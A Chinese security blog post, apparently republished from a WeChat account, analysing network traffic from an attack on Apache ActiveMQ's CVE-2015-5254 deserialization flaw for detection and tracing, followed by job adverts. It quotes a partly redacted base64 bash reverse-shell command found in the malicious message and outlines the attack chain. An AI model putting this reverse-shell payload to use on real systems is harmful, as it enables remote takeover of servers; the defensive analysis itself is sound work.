流量侧溯源-ActiveMQ 反序列化漏洞(CVE-2015-5254)

admin 2021年1月21日15:00:50评论486 views字数 4097阅读13分39秒阅读模式

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

No.1


漏洞原理

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

No.2


流量分析

ActiveMQ监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。http://xx.xx.xx.xx:8161/admin/
我们抓了网卡的包对其中的流量进行分析,来搞清楚攻击的流程,以便我们后续的发现、防御以及溯源。
1、过滤与我们攻击IP进行通信的数据包进行分析。

流量侧溯源-ActiveMQ 反序列化漏洞(CVE-2015-5254)

2、在过滤乱序,重传,转发等杂包之后,我们得到了清晰的一条攻击流量路线。刚开始攻击IP 与服务端IP进行了标准的三次握手的通信

流量侧溯源-ActiveMQ 反序列化漏洞(CVE-2015-5254)

3、在三次握手后我们看到有OpenWire协议的数据包,这里我们可以了解一下ActiveMQ的协议和传输方式:

ActiveMQ 支持多种协议和传输方式,允许客户端使用多种协议连接。
支持的协议:AUTO、OpenWire、AMQP、Stomp、MQTT等
支持的基础传输方式:VM、TCP、SSL、UDP、Peer、Multicast、HTTP(S) 等
支持的高级传输方式:Failover、Fanout、Discovery、ZeroConf
从这个数据包开始我们看到已经有在与ActiveMQ进行通信的流量

流量侧溯源-ActiveMQ 反序列化漏洞(CVE-2015-5254)

4、接下来我们可以清晰的看到BrokerInfo以及后续ConnectionInfo等等的连接通信流量,并在SessionInfo中发现消息编号。

流量侧溯源-ActiveMQ 反序列化漏洞(CVE-2015-5254)
流量侧溯源-ActiveMQ 反序列化漏洞(CVE-2015-5254)

5、在ActiveMQObjectMessage这条数据中,发送的是ActiveMQ对象的一些信息,这个也是攻击payload的push点,我们在数据流中可以发现有

bash -c {echo,YmFzaCAtaSA+JiAxxxxxxxxxxxxxxxxxxxxxxx8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}

的字样,经验丰富的大家一眼也能认出来这是linux反弹shell的payload。

流量侧溯源-ActiveMQ 反序列化漏洞(CVE-2015-5254)

6、因为当这个payload发送至ActiveMQ后,需要在控制台点击查看这条任务才可以触发payload,因此接着我们看一下web层面的包,发现有对/admin/browse.jsp??JMSDestination=event进行访问,这个链接就是展示消息列表的那个地址。

流量侧溯源-ActiveMQ 反序列化漏洞(CVE-2015-5254)

7、紧接着从访问的uri中消息的ID与上面所看到的SessionInfo返回的ID一致,因此可以判断攻击者/管理眼通过点击触发了刚刚那条payload所创建的消息。从流量中的响应码以及响应内容得知,在web端触发这条消息的动作成功执行。

流量侧溯源-ActiveMQ 反序列化漏洞(CVE-2015-5254)

8、下面我们发现服务器与攻击IP的一个固定端口进行定向通信,分析数据包内容得知攻击者发送的payload已经成功被执行,并将shell反弹至攻击者的1234端口。

流量侧溯源-ActiveMQ 反序列化漏洞(CVE-2015-5254)

分析思路:
1、可从流量分析攻击者是否进行端口扫描,探测服务器的端口以确定运行的服务
2、判断攻击者是否访问web的8161端口,并尝试用弱口令进行登录
3、在数据流里分析攻击者是否向61616发送攻击payload
4、判断攻击者是否登录web服务进行点击触发
5、判断请求ID是否与SessionInfo返回的消息ID一致
6、根据状态码以及内容判断执行是否成功
7、分析后续的流量判断主机是否已失陷




招聘启事

安恒雷神众测SRC运营(实习生)
————————
【职责描述】
1.  负责SRC的微博、微信公众号等线上新媒体的运营工作,保持用户活跃度,提高站点访问量;
2.  负责白帽子提交漏洞的漏洞审核、Rank评级、漏洞修复处理等相关沟通工作,促进审核人员与白帽子之间友好协作沟通;
3.  参与策划、组织和落实针对白帽子的线下活动,如沙龙、发布会、技术交流论坛等;
4.  积极参与雷神众测的品牌推广工作,协助技术人员输出优质的技术文章;
5.  积极参与公司媒体、行业内相关媒体及其他市场资源的工作沟通工作。

【任职要求】 
 1.  责任心强,性格活泼,具备良好的人际交往能力;
 2.  对网络安全感兴趣,对行业有基本了解;
 3.  良好的文案写作能力和活动组织协调能力。


简历投递至 

[email protected]


设计师(实习生)

————————

【职位描述】
负责设计公司日常宣传图片、软文等与设计相关工作,负责产品品牌设计。

【职位要求】
1、从事平面设计相关工作1年以上,熟悉印刷工艺;具有敏锐的观察力及审美能力,及优异的创意设计能力;有 VI 设计、广告设计、画册设计等专长;
2、有良好的美术功底,审美能力和创意,色彩感强;精通photoshop/illustrator/coreldrew/等设计制作软件;
3、有品牌传播、产品设计或新媒体视觉工作经历;

【关于岗位的其他信息】
企业名称:杭州安恒信息技术股份有限公司
办公地点:杭州市滨江区安恒大厦19楼
学历要求:本科及以上
工作年限:1年及以上,条件优秀者可放宽


简历投递至

[email protected]

安全招聘
————————

公司:安恒信息
岗位:Web安全 安全研究员
部门:战略支援部
薪资:13-30K
工作年限:1年+
工作地点:杭州(总部)、广州、成都、上海、北京

工作环境:一座大厦,健身场所,医师,帅哥,美女,高级食堂…

【岗位职责】
1.定期面向部门、全公司技术分享;
2.前沿攻防技术研究、跟踪国内外安全领域的安全动态、漏洞披露并落地沉淀;
3.负责完成部门渗透测试、红蓝对抗业务;
4.负责自动化平台建设
5.负责针对常见WAF产品规则进行测试并落地bypass方案

【岗位要求】
1.至少1年安全领域工作经验;
2.熟悉HTTP协议相关技术
3.拥有大型产品、CMS、厂商漏洞挖掘案例;
4.熟练掌握php、java、asp.net代码审计基础(一种或多种)
5.精通Web Fuzz模糊测试漏洞挖掘技术
6.精通OWASP TOP 10安全漏洞原理并熟悉漏洞利用方法
7.有过独立分析漏洞的经验,熟悉各种Web调试技巧
8.熟悉常见编程语言中的至少一种(Asp.net、Python、php、java)

【加分项】
1.具备良好的英语文档阅读能力;
2.曾参加过技术沙龙担任嘉宾进行技术分享;
3.具有CISSP、CISA、CSSLP、ISO27001、ITIL、PMP、COBIT、Security+、CISP、OSCP等安全相关资质者;
4.具有大型SRC漏洞提交经验、获得年度表彰、大型CTF夺得名次者;
5.开发过安全相关的开源项目;
6.具备良好的人际沟通、协调能力、分析和解决问题的能力者优先;
7.个人技术博客;
8.在优质社区投稿过文章;


岗位:安全红队武器自动化工程师
薪资:13-30K
工作年限:2年+
工作地点:杭州(总部)

【岗位职责】
1.负责红蓝对抗中的武器化落地与研究;
2.平台化建设;
3.安全研究落地。

【岗位要求】
1.熟练使用Python、java、c/c++等至少一门语言作为主要开发语言;
2.熟练使用Django、flask 等常用web开发框架、以及熟练使用mysql、mongoDB、redis等数据存储方案;
3:熟悉域安全以及内网横向渗透、常见web等漏洞原理;
4.对安全技术有浓厚的兴趣及热情,有主观研究和学习的动力;
5.具备正向价值观、良好的团队协作能力和较强的问题解决能力,善于沟通、乐于分享。

【加分项】
1.有高并发tcp服务、分布式等相关经验者优先;
2.在github上有开源安全产品优先;
3:有过安全开发经验、独自分析过相关开源安全工具、以及参与开发过相关后渗透框架等优先;
4.在freebuf、安全客、先知等安全平台分享过相关技术文章优先;
5.具备良好的英语文档阅读能力。


简历投递至 

[email protected]

岗位:红队武器化Golang开发工程师
薪资:13-30K
工作年限:2年+
工作地点:杭州(总部)

【岗位职责】
1.负责红蓝对抗中的武器化落地与研究;
2.平台化建设;
3.安全研究落地。

【岗位要求】
1.掌握C/C++/Java/Go/Python/JavaScript等至少一门语言作为主要开发语言;
2.熟练使用Gin、Beego、Echo等常用web开发框架、熟悉MySQL、Redis、MongoDB等主流数据库结构的设计,有独立部署调优经验;
3.了解docker,能进行简单的项目部署;
3.熟悉常见web漏洞原理,并能写出对应的利用工具;
4.熟悉TCP/IP协议的基本运作原理;
5.对安全技术与开发技术有浓厚的兴趣及热情,有主观研究和学习的动力,具备正向价值观、良好的团队协作能力和较强的问题解决能力,善于沟通、乐于分享。

【加分项】
1.有高并发tcp服务、分布式、消息队列等相关经验者优先;
2.在github上有开源安全产品优先;
3:有过安全开发经验、独自分析过相关开源安全工具、以及参与开发过相关后渗透框架等优先;
4.在freebuf、安全客、先知等安全平台分享过相关技术文章优先;
5.具备良好的英语文档阅读能力。


简历投递至

[email protected]

流量侧溯源-ActiveMQ 反序列化漏洞(CVE-2015-5254)

专注渗透测试技术

全球最新网络攻击技术

END

流量侧溯源-ActiveMQ 反序列化漏洞(CVE-2015-5254)

本文始发于微信公众号(雷神众测):流量侧溯源-ActiveMQ 反序列化漏洞(CVE-2015-5254)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年1月21日15:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   流量侧溯源-ActiveMQ 反序列化漏洞(CVE-2015-5254)http://cn-sec.com/archives/173055.html

发表评论

匿名网友 填写信息